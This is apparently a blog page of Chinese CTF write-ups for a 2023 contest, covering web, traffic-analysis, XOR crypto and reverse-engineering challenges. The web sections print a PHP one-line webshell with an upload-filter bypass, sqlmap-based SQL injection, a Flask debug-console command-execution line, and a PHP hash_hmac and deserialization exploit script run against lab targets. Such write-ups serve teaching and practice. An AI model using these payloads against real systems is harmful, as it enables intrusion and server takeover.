0
点赞
收藏
分享

微信扫一扫

Python函数的基本使用(一)

工程与房产肖律师 2023-12-09 阅读 36
网络CTF

文章目录

请添加图片描述


一、2023csy-web1

在这里插入图片描述
web页面一直在播放cavas 动画,显示字体内容为:TEXTArray = [“你”, “永远”, “也”, “看不见”, “我”, “站在”, “窗边”, “最难过”, “的样子”, “因为”, “你”, “知道的”, “在”, “所有”, “看不见”, “你的”, “时候”, “才是”, “最”, “难”, “过”, “的”, “我”, “爱”, “你”]; F12 查看源代码,全局搜索未发现与flag相关的逻辑代码:

在这里插入图片描述

使用 dirsearch 进行目录扫描发现存在 git 泄露

在这里插入图片描述使用 git_extract.py 工具获取git仓库内容,发现 importtant.txt 存在flag:
在这里插入图片描述


二、2023csy-web2

在这里插入图片描述
发现网站的注册用户名存在xss漏洞,搞个接码平台看是否能获得管理员的cookie, 可能flag在管理员用户界面里,但是半天解码平台平台没反应,此路不通。使用 dirsearch 进行目录扫描发现 admin/login 以及 src/search.php 路径,发现搜索界面存在sql注入,使用sqlmap进行利用,获得用户名账号和密码:

在这里插入图片描述登录管理员端,存在 /admin/edit.php 路径,可进行文件上传,直接上传一句话木马php会被拦截,如下绕过:
在这里插入图片描述<script language="pHp">@eval($_POST['x'])</script>
使用蚂剑进行连接,发现flag:
在这里插入图片描述


三、2023csy-web3

查看源代码,我们可以看到web服务多个路径。还有一个/get_file路径:

@app.route('/get_file/<path:name>')
def get_file(name):
   return send_from_directory(app.config['FILES_FOLDER'], name, as_attachment=True)

因此,如果我们分析代码,我们会发现两件事,第一件事是应用程序日志被写入/tmp/app中的文件,这也是
**/get_file端点中使用的同一目录。

app.config['FILES_FOLDER'] = '/tmp/app'
logging.basicConfig(filename='/tmp/app/app.log', level=logging.DEBUG, format=f'%
(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')

这样我们就能够获取应用程序日志,但是我们能用它做什么呢?这就是第二个配置错误出现的地方,调试模式已
打开:

if __name__ == '__main__':
   app.run(host='0.0.0.0', port=8000, debug=True)

说明该网站Flask开启debug模式,相当于给hacker留了后门。但我们需要 PIN 码才能访问它,该 PIN 码会在应用程序启动时写入日志。因此,我们需要获取app.log文件并获取将写入其中的控制台 PIN。

要获取日志文件,我们可以使用/get_file路径 http://**/get_file/app.log。在那里我们可以找到控制台的 PIN 码。进入控制台后,我们只需要找到该标志并读取其内容即可。

在这里插入图片描述然后进入后台 http://**/console, 输入:__import__('os').popen('cat /flag').read()

在这里插入图片描述


四、2023csy-web4

在这里插入图片描述
审计以上代码可以得出两个知识点:hash_hmac绕过 + 反序列化 + 匿名函数爆破。先看 hash_hmac 绕过,代码可以分离成如下:

	$secret = hash_hmac('sha256', $_GET['salt'], file_get_contents('/flag'));
	$hmac = hash_hmac('sha256', $_GET['password'], $secret);
	if ($_GET['mac'] === $hmac) {
    	show_source("/flag");
	}

当我们给 hash_hmac 第二个参数传递的值为数组的时候,会返回 false。这时 secret 的值我们就可以控制为 false。

在这里插入图片描述
故 payload 为:salt[]=1&password=1&mac=41e0a9448f91edba4b05c6c2fc0edb1d6418aa292b5b2942637bec43a29b9523
再看反序列化,代码可以分离成如下:

class Bird {
    public $funcs;
    public $salt;
    public $flag;

    function say_flag() {
    	echo "输出flag";
    }
    function __destruct() {
        $self_func = $this->funcs;
        $self_func();
    }
}
unserialize($_GET['d']);

代码段中存在魔法函数 __destruct,在对象的所有引用都被删除时或者对象被显式销毁时调用,当对象被销毁时自动调用。要想执行 say_flag() 函数,那就要 __destruct() 函数中的 funcs 下手,序列化代码如下:

<?php
class Bird{
    public $funcs=['Bird','say_flag'];
    public $salt;
    public $flag;

    function say_flag(){
       echo "输出flag";
    }
    function __destruct(){
        $self_func=$this->funcs;
        $self_func();
    }
}
$s = new Bird();
echo serialize($d);

在这里插入图片描述

故payload为:d=O:4:"Bird":3:{s:5:"funcs";a:2:{i:0;s:4:"Bird";i:1;s:8:"say_flag";}s:4:"salt";N;s:4:"flag";N;}。再看匿名函数,代码可以分离成如下:

if (isset($_GET['p'])) {
    $funcs = create_function("", "unserialize(\$_GET['d']);");
    $_GET['p']();
} else {
    show_source(__FILE__);
}

其实我们只要执行$funcs就可以了,但是我们不知道这个函数的名称,是一个匿名函数。

把上述payload组合到一起,编写 exp 如下:

import requests

url='http://localhost/zxb-csy-web4.php?salt[]=1&password=1&mac=41e0a9448f91edba4b05c6c2fc0edb1d6418aa292b5b2942637bec43a29b9523&d=O:4:"Bird":3:{s:5:"funcs";a:2:{i:0;s:4:"Bird";i:1;s:8:"say_flag";}s:4:"salt";N;s:4:"flag";N;}&p=%00lambda_1'

while True:
    r = requests.get(url).text
    if 'Call to undefined function' not in r:
        print(r)
        break

最终解得flag如下:

在这里插入图片描述


五、2023csy-misc1

查看流量包主要有 TCP、UDP、HTTP 协议,hacker盗取敏感信息大概率是 HTTP 或者 TCP。UDP 几乎没见过,先排除。优先分析 HTTP 流量,如下查看 HTTP 请求序列:

在这里插入图片描述
在这里插入图片描述
看到可疑请求路径 /hack.php, 输入过滤命令:http contains "hack.php"

在这里插入图片描述
http流跟踪发现 f14444444g.php :

在这里插入图片描述
筛选含有 f14444444g.php 的流量包, http contains "f14444444g.php"

在这里插入图片描述
依次查看发现可疑字符串,Base64 解码得到flag:

在这里插入图片描述


六、2023csy-misc2

wireshark 打开发现很多 dns 协议数据包,而且存在 Base 字眼:

在这里插入图片描述直接使用kali 里面 tshark 命令筛选分离:tshark -r pack.pcapng -Y "dns" -T fields -e dns.qry.name | grep base > dns.txt

在这里插入图片描述
拿去 vscode 快速去重处理得:

在这里插入图片描述
base64 解密得flag:
在这里插入图片描述


七、2023csy-crypto1

enc = open('flag.enc', 'rb').read()
enc = list(enc)
print(enc)

key = 'zxb'
flag = [0] * len(enc)
print(len(flag))
flag[-1] = ord('}')
for i in range(len(flag)-2, -1, -1):
    flag[i] = flag[i+1] ^ enc[i] ^ ord(key[i%3])
print(bytes(flag))

在这里插入图片描述


八、2023csy-re1

先查看 PE:
在这里插入图片描述
64位程序,使用 ida64 打开,f5 查看伪代码:

在这里插入图片描述
这段代码是一个简单的文件读取和处理程序,它从文件 “flag.txt” 读取 0x13(19)字节的数据,然后进行异或操作,并检查结果是否与某个预定义的字符串 Str2 相匹配。要反推出 “flag.txt” 的内容,在这里,*(&Str1 + i) = i ^ *((_BYTE *)Buffer + i); 表示将文件中每个字节与索引进行异或运算,并将结果存储在 Str1 中。要得到 flag.txt 的内容,您可以创建一个相反的异或操作,将 Str1 中的每个字节与相应的索引再次进行异或。在 ida 里面找到 str2 为:S[]1475XRQUHY]QIQZW

在这里插入图片描述编写脚本:

# 已知的str2值
str2 = "S[]1475XRQUHY]QIQZW"

# 解码函数,根据异或的性质:如果 a ^ b = c 那么 a ^ c = b 以及 b ^ c = a
def decode(encoded_str):
    # 将str2转化为byte array方便进行异或操作
    encoded_bytes = bytearray(encoded_str, 'utf-8')
    # 初始化str1
    str1 = bytearray(len(encoded_bytes))

    # 按照C程序中的流程反向执行异或操作
    for i in range(len(encoded_bytes)):
        # 因为之前是i和字符异或,所以逆运算也是i和字符异或
        str1[i] = i ^ encoded_bytes[i]
    
    # 转换回字符串形式
    return str1.decode('utf-8')

# 使用定义好的decode函数解码str2
decoded_str1 = decode(str2)
print(f"Decoded str1: {decoded_str1}")

得到 flag 为:
在这里插入图片描述但是提交发现一直错误,难道这是陷阱? 查看函数列表发现 TLS 回调函数

在这里插入图片描述

查看 TlsCallback_0 函数:

在这里插入图片描述从代码能看出一直在跟 loc_140003000 函数做处理,怀疑是 SMC 自解密技术。

在 return result 打断点,进行动态调试:

在这里插入图片描述卡在 52行,smc 自解密已经完成,直接进入 loc_140003000 函数,U、C、P, F5 一把梭查看到真实代码:

在这里插入图片描述编写 python 脚本如下:

def reverse_function(a1, a2):
    return ~a2 & ~a1

v25 = [-83, -91, -93, -49, -52, -55, -53, -88, -82, -81, -85, -72, -89, -93, -81, -88, -89, -95, -51]
v12 = [0] * 32
arr = [0] * 19

for i in range(19):
    for j in range(200):
        v16 = reverse_function(j, i)
        v17 = reverse_function(i, i)
        v1 = j
        v18 = v1
        v2 = reverse_function(v1, v1)
        v3 = reverse_function(v2, v17)
        v19 = reverse_function(v3, v16) - 1
        v20 = reverse_function(j, i)
        v21 = reverse_function(i, i)
        v4 = j
        v22 = v4
        v5 = reverse_function(v4, v4)
        v6 = reverse_function(v5, v21)
        v7 = reverse_function(v6, v20)
        v12[i] = reverse_function((v7 - 1), v19)
        if v12[i] == v25[i]:
            arr[i] = j

# Convert arr to string and print
result_str = ''.join(chr(x) for x in arr)
print(result_str)

在这里插入图片描述最终flag{SZ_2023_ZX_CUP_WIN!} 为正确答案。


举报

相关推荐

0 条评论